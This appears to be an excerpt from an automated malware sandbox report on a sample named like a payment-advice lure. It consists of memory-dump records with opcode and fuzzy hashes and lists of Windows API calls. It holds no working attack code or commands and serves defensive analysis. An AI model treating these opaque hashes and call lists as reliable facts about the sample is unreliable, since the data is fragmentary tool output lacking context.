                                                                                                                                          • Instruction Fuzzy Hash: AED19F74E013288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 231b45eed2c119a03b548eaa46d4e60b28f9fbd34d7e1a36a5c0f8e17becee39
                                                                                                                                          • Instruction ID: c3e86c27e88de719da9f05eff7894c3e5ae13a56293c6915322f266a1d822a76
                                                                                                                                          • Opcode Fuzzy Hash: 231b45eed2c119a03b548eaa46d4e60b28f9fbd34d7e1a36a5c0f8e17becee39
                                                                                                                                          • Instruction Fuzzy Hash: 14D19E74E013288FDB54DFA5C994B9DBBB2BF89300F2081AAD419AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8b6c052144bf4259d53747a3062a7df35b11f8fff64eb9b48a7e242a3e928900
                                                                                                                                          • Instruction ID: 90bcef7d47061b3f2b6c57855f9c7b71968a8b5835e7ef9c9591f232d756c5f4
                                                                                                                                          • Opcode Fuzzy Hash: 8b6c052144bf4259d53747a3062a7df35b11f8fff64eb9b48a7e242a3e928900
                                                                                                                                          • Instruction Fuzzy Hash: 92D19E74E112288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7854f4105d6470234a23ac77e4657e3868670fcdaca984af238d27160b208507
                                                                                                                                          • Instruction ID: bd892529b81285667014539fcc7ac41ab8073bd2d150b00a070948df8b640499
                                                                                                                                          • Opcode Fuzzy Hash: 7854f4105d6470234a23ac77e4657e3868670fcdaca984af238d27160b208507
                                                                                                                                          • Instruction Fuzzy Hash: 9ED19F78E01228CFDB54DFA5C994B9DBBB2BF89300F2081A9D419AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 97278431e74722f1fbb2e66f37ed37184db5ba9094a65c701939a12b1029dde2
                                                                                                                                          • Instruction ID: ed89b3b0fef9b0689f0c01f4ed44d387bee7a6675133e280d3b6638e35a41e4f
                                                                                                                                          • Opcode Fuzzy Hash: 97278431e74722f1fbb2e66f37ed37184db5ba9094a65c701939a12b1029dde2
                                                                                                                                          • Instruction Fuzzy Hash: 23D1AE74E013288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e4dc1eb0abef109927a216e18ff54fc0b18fb2cee9a9122d6658fd176bba6942
                                                                                                                                          • Instruction ID: 03858c5224ab7da0f20ff6a2db2b4dfd1f8950bf1fda1a74c9a9cce1f3cef732
                                                                                                                                          • Opcode Fuzzy Hash: e4dc1eb0abef109927a216e18ff54fc0b18fb2cee9a9122d6658fd176bba6942
                                                                                                                                          • Instruction Fuzzy Hash: 6FD19E74E013288FDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 87cd359f340124440b743673316e924bb1888ac335ed9ff24866d8770256d061
                                                                                                                                          • Instruction ID: e3cd6fc78d4a3a34ac16cf7003ace016c9af4e7bdee2b55aec242d6c6e31b260
                                                                                                                                          • Opcode Fuzzy Hash: 87cd359f340124440b743673316e924bb1888ac335ed9ff24866d8770256d061
                                                                                                                                          • Instruction Fuzzy Hash: F0D19E74E01228CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB354DB359E85CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353627350.000000003A810000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A810000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a810000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: e6f9e814fd2df9cfa4b8e94214065010fb6e695bb922870863e2d36a0c08c8c7
                                                                                                                                          • Instruction ID: c42a82889239f42e7874e55eee4812a0e24a660ae82ee96fc38dad075001b08b
                                                                                                                                          • Opcode Fuzzy Hash: e6f9e814fd2df9cfa4b8e94214065010fb6e695bb922870863e2d36a0c08c8c7
                                                                                                                                          • Instruction Fuzzy Hash: 9FD19E74E01228CFDB54DFA5C994B9DBBB2BF89300F2081AAD409AB355DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 16ecb329d585d8e45996d335b3aebab2168abea92cad7895e38d5da8201638f5
                                                                                                                                          • Instruction ID: 7976002c93937bb6fffae8e1022b179cd047eb4f343bc9728174cf3121f33449
                                                                                                                                          • Opcode Fuzzy Hash: 16ecb329d585d8e45996d335b3aebab2168abea92cad7895e38d5da8201638f5
                                                                                                                                          • Instruction Fuzzy Hash: 35D1A178E10218CFDB54DFA9C984B9DBBB2BF89300F2080A9D509AB355DB355D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a488eeb550587d8bdd17f1070160d25dd91af04db66a676246e0f5b16b6be858
                                                                                                                                          • Instruction ID: 54d13a10efc4837d2b6ab496ad529bf739a43111d78ffd0cd3de22a3d5245804
                                                                                                                                          • Opcode Fuzzy Hash: a488eeb550587d8bdd17f1070160d25dd91af04db66a676246e0f5b16b6be858
                                                                                                                                          • Instruction Fuzzy Hash: 34D19178E10218CFDB54DFA9C994B9DBBB2BF89300F1080A9D809AB355DB356D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 859927bf8baa18605168579b3ee2e14619c4a4ee88cf561c1b832aa7e0d71d91
                                                                                                                                          • Instruction ID: 9d9cdf3b302ced091d188888f49068833f47afe9a3c549cf378a2be6db602ca9
                                                                                                                                          • Opcode Fuzzy Hash: 859927bf8baa18605168579b3ee2e14619c4a4ee88cf561c1b832aa7e0d71d91
                                                                                                                                          • Instruction Fuzzy Hash: F6D1A178E10218CFDB54DFA9C980B9DBBB2BF89300F2090A9D809AB355DB315D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 292a6ee462f1a35bc951860d8009229c9e1b8fc182286d5fb15426a790f47083
                                                                                                                                          • Instruction ID: bbfb60b74081619ef699c277524f4515d722d2dd4f4d38723709c34538ffa959
                                                                                                                                          • Opcode Fuzzy Hash: 292a6ee462f1a35bc951860d8009229c9e1b8fc182286d5fb15426a790f47083
                                                                                                                                          • Instruction Fuzzy Hash: A8D1AF78E10218CFDB54DFA9C994B9DBBB2BF89300F2080A9D809AB355DB315D86CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 4e4e3701299b88b8bdffc6c9b17780e9ff0bc7e128cc2b0d8dd4b85c4e9f9bb4
                                                                                                                                          • Instruction ID: 547ae2b93c54eea11e2e3e9857adb41b8834f406e1203f1078c22cd5d7a2efd2
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: fa8af9fea260036e3759d6cff0b65249ba6da560ea69d2dbf1ccf192c735023b
                                                                                                                                          • Instruction ID: ccee2be39639b07e99eb186941e3373ba6489e8cd6dbdb865eabc47c8baa05f7
                                                                                                                                          • Opcode Fuzzy Hash: fa8af9fea260036e3759d6cff0b65249ba6da560ea69d2dbf1ccf192c735023b
                                                                                                                                          • Instruction Fuzzy Hash: 30C1D274E10218CFDB54DFA5C944B9DBBB2BF89300F2081AAD809AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 3d3643d024b0cf6a75926e23a6f70855324f78ccb89273635c46c3f0e3fb0d71
                                                                                                                                          • Instruction ID: af33ed138b63c3de5e6172431d5e6e9a77f7e482debd5270542aa550e8b25c8a
                                                                                                                                          • Opcode Fuzzy Hash: 3d3643d024b0cf6a75926e23a6f70855324f78ccb89273635c46c3f0e3fb0d71
                                                                                                                                          • Instruction Fuzzy Hash: 81C1B374E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0501f6102f794833600e0869a7dddb29b4e41157681544e8d5dd18d31ce91380
                                                                                                                                          • Instruction ID: 49b5dbc8345dd16f6715f8fd1e068d3922d98a54a85b483b4299e67d1635d9cf
                                                                                                                                          • Opcode Fuzzy Hash: 0501f6102f794833600e0869a7dddb29b4e41157681544e8d5dd18d31ce91380
                                                                                                                                          • Instruction Fuzzy Hash: A5C1B274E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB355DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 7c140cda148e5bcc5219eb5e141b65f0ef1f7be74e544a4fd8e5ca6ed2ae171f
                                                                                                                                          • Instruction ID: 75a1be4dab565e5ff09c143ca75b71efe86ba2931feb5be3868f5393c617f0b2
                                                                                                                                          • Opcode Fuzzy Hash: 7c140cda148e5bcc5219eb5e141b65f0ef1f7be74e544a4fd8e5ca6ed2ae171f
                                                                                                                                          • Instruction Fuzzy Hash: F9C1B274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8332e7fe70a73d5f7228d7651d795723ac30ffeae77e6d1620952616f817cd48
                                                                                                                                          • Instruction ID: 99cbacfe5108d2614c4a8e0a838fdae64eba9bcc3f65d21abce26b3e3ba62529
                                                                                                                                          • Opcode Fuzzy Hash: 8332e7fe70a73d5f7228d7651d795723ac30ffeae77e6d1620952616f817cd48
                                                                                                                                          • Instruction Fuzzy Hash: B0C1A374E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD809AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5ef790968e02457f435d00b239aa27797a8ae7885db32def04a270aa78a585cc
                                                                                                                                          • Instruction ID: 3c1d709e5de141312518cd7ecac0b0d0d0ecc0f0b7037d057247b3371dff81ad
                                                                                                                                          • Opcode Fuzzy Hash: 5ef790968e02457f435d00b239aa27797a8ae7885db32def04a270aa78a585cc
                                                                                                                                          • Instruction Fuzzy Hash: 99C1B374E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB395DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9a91ea10cc2d366a83187fd53122b46bab4858e371a0859ada4a8f83f5f3d2ae
                                                                                                                                          • Instruction ID: bdff9a7eea5058f163bfc0a3d0557af421d572a229624bb3e977095b87f02a40
                                                                                                                                          • Opcode Fuzzy Hash: 9a91ea10cc2d366a83187fd53122b46bab4858e371a0859ada4a8f83f5f3d2ae
                                                                                                                                          • Instruction Fuzzy Hash: 0FC1B374E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: b9450353159a5c2a0714f824728bf3399ffd79f1023fd58ae08eda7826bfb82a
                                                                                                                                          • Instruction ID: 44673b5c76d1accdb6b6f3d46cd5ba4711f62266eb611510967281b1cf35dd25
                                                                                                                                          • Opcode Fuzzy Hash: b9450353159a5c2a0714f824728bf3399ffd79f1023fd58ae08eda7826bfb82a
                                                                                                                                          • Instruction Fuzzy Hash: 1FC1A274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1fca0620aa4daa1f458a10b76e5472c12d918d475d2a05b42d45c74c50b06372
                                                                                                                                          • Instruction ID: ef59011ca59fa8fd5da45688b99425a625e0ddf9eaa4d77a3788ef1861502b9e
                                                                                                                                          • Opcode Fuzzy Hash: 1fca0620aa4daa1f458a10b76e5472c12d918d475d2a05b42d45c74c50b06372
                                                                                                                                          • Instruction Fuzzy Hash: 38C1B274E11218CFDB54DFA5C954B9DBBB2BF89300F2080AAD409AB395DB35AE85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353547375.000000003A7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7E0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_3a7e0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8053242d8930e868b6b0e09fc335907156c601c977699b7a7ee78681c64e93b5
                                                                                                                                          • Instruction ID: aec56b887523a0a674ca7f9f14111f3920fcae11be6d041ac837708a4d678ba9
                                                                                                                                          • Opcode Fuzzy Hash: 8053242d8930e868b6b0e09fc335907156c601c977699b7a7ee78681c64e93b5
                                                                                                                                          • Instruction Fuzzy Hash: 79C1A274E11218CFDB54DFA5C994B9DBBB2BF89300F2080AAD409AB355DB359E85CF50
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 91118f4ffe157178db19ad14826e2595c67bd6ad6671e6fef8dfbb4ce02331f0
                                                                                                                                          • Instruction ID: 635d81ae35e7d0bcb66728771b3050e092b02316ed7cc5e0bb2b529c39082e44
                                                                                                                                          • Opcode Fuzzy Hash: 91118f4ffe157178db19ad14826e2595c67bd6ad6671e6fef8dfbb4ce02331f0
                                                                                                                                          • Instruction Fuzzy Hash: 42A1BC74A01268DFDB64DF64C894BDABBB2BB4A305F5084EAD40EA7350CB319E81CF51
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.3353184341.0000000039EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 39EF0000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_39ef0000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: d5dd5ec4de7ab123732380db5333e6561015977a444f09a6af6320046435bbf5
                                                                                                                                          • Instruction ID: 840f352f193863ce0d5769c7169f107396ad05ee8c66305b1fb638729cd0bfb7
                                                                                                                                          • Opcode Fuzzy Hash: d5dd5ec4de7ab123732380db5333e6561015977a444f09a6af6320046435bbf5
                                                                                                                                          • Instruction Fuzzy Hash: E1519E74A01229DFCB64DF64C854BAAB7B2FB4A305F5085EAD40EA7350CB319E82CF50
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 00405332
                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 00405341
                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040537E
                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 00405386
                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004053A7
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053B8
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053CB
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053D9
• SendMessageW.USER32(?,00001024,00000000,?), ref: 004053EC
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040540E
• ShowWindow.USER32(?,00000008), ref: 00405422
• GetDlgItem.USER32(?,000003EC), ref: 00405443
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405453
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040546C
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405478
• GetDlgItem.USER32(?,000003F8), ref: 00405350
  • Part of subcall function 00404164: SendMessageW.USER32(00000028,?,00000001,00403F90), ref: 00404172
• GetDlgItem.USER32(?,000003EC), ref: 00405495
• CreateThread.KERNEL32(00000000,00000000,Function_00005267,00000000), ref: 004054A3
• CloseHandle.KERNEL32(00000000), ref: 004054AA
• ShowWindow.USER32(00000000), ref: 004054CE
• ShowWindow.USER32(?,00000008), ref: 004054D3
• ShowWindow.USER32(00000008), ref: 0040551D
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405551
• CreatePopupMenu.USER32 ref: 00405562
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405576
• GetWindowRect.USER32(?,?), ref: 00405596
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055AF
• SendMessageW.USER32(?,00001073,00000000,?), ref: 004055E7
• OpenClipboard.USER32(00000000), ref: 004055F7
• EmptyClipboard.USER32 ref: 004055FD
• GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405609
• GlobalLock.KERNEL32(00000000), ref: 00405613
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405627
• GlobalUnlock.KERNEL32(00000000), ref: 00405647
• SetClipboardData.USER32(0000000D,00000000), ref: 00405652
• CloseClipboard.USER32 ref: 00405658
Strings
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
• String ID: {
• API String ID: 590372296-366298937
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
• ShowWindow.USER32(?), ref: 00403CB0
• DestroyWindow.USER32 ref: 00403CC4
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
• GetDlgItem.USER32(?,?), ref: 00403D01
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
• IsWindowEnabled.USER32(00000000), ref: 00403D1C
• GetDlgItem.USER32(?,00000001), ref: 00403DCA
• GetDlgItem.USER32(?,00000002), ref: 00403DD4
• SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
• GetDlgItem.USER32(?,00000003), ref: 00403EE5
• ShowWindow.USER32(00000000,?), ref: 00403F06
• EnableWindow.USER32(?,?), ref: 00403F18
• EnableWindow.USER32(?,?), ref: 00403F33
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
• EnableMenuItem.USER32(00000000), ref: 00403F50
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
• lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
• SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
• ShowWindow.USER32(?,0000000A), ref: 004040EC
Memory Dump Source
• Source File: 00000004.00000002.3323338301.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.3323317231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323361272.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323381590.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.3323411511.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
• String ID:
• API String ID: 184305955-0
APIs
  • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
  • Part of subcall function 00406254: LoadLibraryA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406271
  • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
• lstrcatW.KERNEL32(00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800,75923420,00000000,00434000), ref: 00403935
• lstrlenW.KERNEL32(00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,00436800), ref: 004039B5
• lstrcmpiW.KERNEL32(00427178,.exe,00427180,?,?,?,00427180,00000000,00434800,00436000,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
• GetFileAttributesW.KERNEL32(00427180), ref: 004039D3
